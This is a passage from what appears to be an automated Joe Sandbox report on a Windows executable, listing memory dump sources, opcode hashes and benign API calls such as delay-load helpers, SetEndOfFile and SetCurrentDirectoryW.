              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: ea38c25eee3c871b0ca9d0822de6d0d103ec9e62787799c51d2b7a410cbe5dd3
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: ea38c25eee3c871b0ca9d0822de6d0d103ec9e62787799c51d2b7a410cbe5dd3
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d745cfa6b0cdd930268c6e4ece3e8b66de1178168a34dd908e780e09b3b0fada
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: d745cfa6b0cdd930268c6e4ece3e8b66de1178168a34dd908e780e09b3b0fada
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d4fa70bf6a4ffb150d8501120e7acdd84333daf352b71a6550853a77b62e58da
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: d4fa70bf6a4ffb150d8501120e7acdd84333daf352b71a6550853a77b62e58da
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b41f82f07daaa1bc76e6c8a6c244ae383630828dfee7446473a95649db371b7c
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: b41f82f07daaa1bc76e6c8a6c244ae383630828dfee7446473a95649db371b7c
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 18c4c159bf54fed86bdc122fa35bf0e9556ff484ec738c9ceb67f6fb12cb8229
              • Instruction ID: 642997830eb71e53dbf91ce4bbf9c67f2836a27c025026a7a1be202c8c8e09f5
              • Opcode Fuzzy Hash: 18c4c159bf54fed86bdc122fa35bf0e9556ff484ec738c9ceb67f6fb12cb8229
              • Instruction Fuzzy Hash: 6AA011A22AC0023C3808B203AC03E3A02CCC0C0B2233082BAB00AA0088A8C808080830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 24ea427bf98c016853bb811c45562b5fbf01570c4ad26eb6b0a9ee9c3a25ffbf
              • Instruction ID: 6616a1dfa094792f368ded20bedc01bdd3203f77cf63719ff8df3c0b8a322b48
              • Opcode Fuzzy Hash: 24ea427bf98c016853bb811c45562b5fbf01570c4ad26eb6b0a9ee9c3a25ffbf
              • Instruction Fuzzy Hash: 60A011A22AC002BC38083203AC03E3A02CCC0C0B203308ABAB00AA0088A8C808080830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 540d54aaae50805cf3d7263c5afd443368660bf4723e2aa47a6dc2bd59d7f35f
              • Instruction ID: 6616a1dfa094792f368ded20bedc01bdd3203f77cf63719ff8df3c0b8a322b48
              • Opcode Fuzzy Hash: 540d54aaae50805cf3d7263c5afd443368660bf4723e2aa47a6dc2bd59d7f35f
              • Instruction Fuzzy Hash: 60A011A22AC002BC38083203AC03E3A02CCC0C0B203308ABAB00AA0088A8C808080830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 2169e8de2d353d73e315bb61c91e84e15774400cbcc3c78bc48ba6b08ef86a42
              • Instruction ID: 6616a1dfa094792f368ded20bedc01bdd3203f77cf63719ff8df3c0b8a322b48
              • Opcode Fuzzy Hash: 2169e8de2d353d73e315bb61c91e84e15774400cbcc3c78bc48ba6b08ef86a42
              • Instruction Fuzzy Hash: 60A011A22AC002BC38083203AC03E3A02CCC0C0B203308ABAB00AA0088A8C808080830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: becb68c5d49b614b069ec654564cfa7079bdc607fe336cc087ee1fcd7799182d
              • Instruction ID: 6616a1dfa094792f368ded20bedc01bdd3203f77cf63719ff8df3c0b8a322b48
              • Opcode Fuzzy Hash: becb68c5d49b614b069ec654564cfa7079bdc607fe336cc087ee1fcd7799182d
              • Instruction Fuzzy Hash: 60A011A22AC002BC38083203AC03E3A02CCC0C0B203308ABAB00AA0088A8C808080830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d5a895d9ce8f0817f323d8e307f0c106e74c6595a449cf34cc95937c06644b94
              • Instruction ID: 6616a1dfa094792f368ded20bedc01bdd3203f77cf63719ff8df3c0b8a322b48
              • Opcode Fuzzy Hash: d5a895d9ce8f0817f323d8e307f0c106e74c6595a449cf34cc95937c06644b94
              • Instruction Fuzzy Hash: 60A011A22AC002BC38083203AC03E3A02CCC0C0B203308ABAB00AA0088A8C808080830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 3ce46fa86ce99e18cf580052d36c16201f64e4b15773aa12bc12d8f27d48fe79
              • Instruction ID: 86b9904c769aaee16711ce6c14e4e74d5b9462e2e35116949b7922cc4717c066
              • Opcode Fuzzy Hash: 3ce46fa86ce99e18cf580052d36c16201f64e4b15773aa12bc12d8f27d48fe79
              • Instruction Fuzzy Hash: 85A001AA2AD106BD390C66666D6BEBA02ACD4C4B6137189AAB50A940A1AAD09C495431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d25866b57e9e4348a688311e2dfdbde937a95f723ae7439d7b1277af6d254443
              • Instruction ID: 86b9904c769aaee16711ce6c14e4e74d5b9462e2e35116949b7922cc4717c066
              • Opcode Fuzzy Hash: d25866b57e9e4348a688311e2dfdbde937a95f723ae7439d7b1277af6d254443
              • Instruction Fuzzy Hash: 85A001AA2AD106BD390C66666D6BEBA02ACD4C4B6137189AAB50A940A1AAD09C495431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e13609aa0b850bb0c4aa97353feb7b07b45349f23d97a8b515a864cf415459d2
              • Instruction ID: 86b9904c769aaee16711ce6c14e4e74d5b9462e2e35116949b7922cc4717c066
              • Opcode Fuzzy Hash: e13609aa0b850bb0c4aa97353feb7b07b45349f23d97a8b515a864cf415459d2
              • Instruction Fuzzy Hash: 85A001AA2AD106BD390C66666D6BEBA02ACD4C4B6137189AAB50A940A1AAD09C495431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 9381dcb99fd4deed4b6f1b42947bf9480bab28668d075273a253a40753ec532e
              • Instruction ID: 86b9904c769aaee16711ce6c14e4e74d5b9462e2e35116949b7922cc4717c066
              • Opcode Fuzzy Hash: 9381dcb99fd4deed4b6f1b42947bf9480bab28668d075273a253a40753ec532e
              • Instruction Fuzzy Hash: 85A001AA2AD106BD390C66666D6BEBA02ACD4C4B6137189AAB50A940A1AAD09C495431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DC36
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 5cbf9dfe428043099254e7e167b98c19257ab3bd887922d212df01070638827e
              • Instruction ID: b07dcb3f31a209a83566b58dc67197620034b70ede61692c61fcdfec62c52ac0
              • Opcode Fuzzy Hash: 5cbf9dfe428043099254e7e167b98c19257ab3bd887922d212df01070638827e
              • Instruction Fuzzy Hash: B1A0029556D1027D350C65566D57D7602ACC4C4B513304DADB5079406155C0DC455431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DC36
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e5351d1812ef9f832aa0aa3a10f6dbd5560eb67f615702687beb4ad4780a525e
              • Instruction ID: b07dcb3f31a209a83566b58dc67197620034b70ede61692c61fcdfec62c52ac0
              • Opcode Fuzzy Hash: e5351d1812ef9f832aa0aa3a10f6dbd5560eb67f615702687beb4ad4780a525e
              • Instruction Fuzzy Hash: B1A0029556D1027D350C65566D57D7602ACC4C4B513304DADB5079406155C0DC455431
              APIs
              • SetEndOfFile.KERNELBASE(?,00B89104,?,?,-00001964), ref: 00B89EC2
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: File
              • String ID:
              • API String ID: 749574446-0
              • Opcode ID: b65e8f32245f1e87dafc6693e807d5f1df4fb77b1b77bfb8c10bbabb36bbb696
              • Instruction ID: 9c8fcd1559b11e9b27f6767c92087a716add9f5d68eac979b7f0908ff76d1314
              • Opcode Fuzzy Hash: b65e8f32245f1e87dafc6693e807d5f1df4fb77b1b77bfb8c10bbabb36bbb696
              • Instruction Fuzzy Hash: 85B011300A000A8B8E003B30CC08A283AA0EA22B0A30282A0A002CA0A0CF22C002AA00
              APIs
              • SetCurrentDirectoryW.KERNELBASE(?,00B9A587,C:\Users\user\Desktop,00000000,00BC946A,00000006), ref: 00B9A326
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: bc5f5c4856752fa653ebe8da2759825e8975f23580f9299aa6653e4243177dc8
              • Instruction ID: c5bce252f2e5a109c81547a34c10b5d54f0f1496171ef9960b7a7f1a293ed961
              • Opcode Fuzzy Hash: bc5f5c4856752fa653ebe8da2759825e8975f23580f9299aa6653e4243177dc8
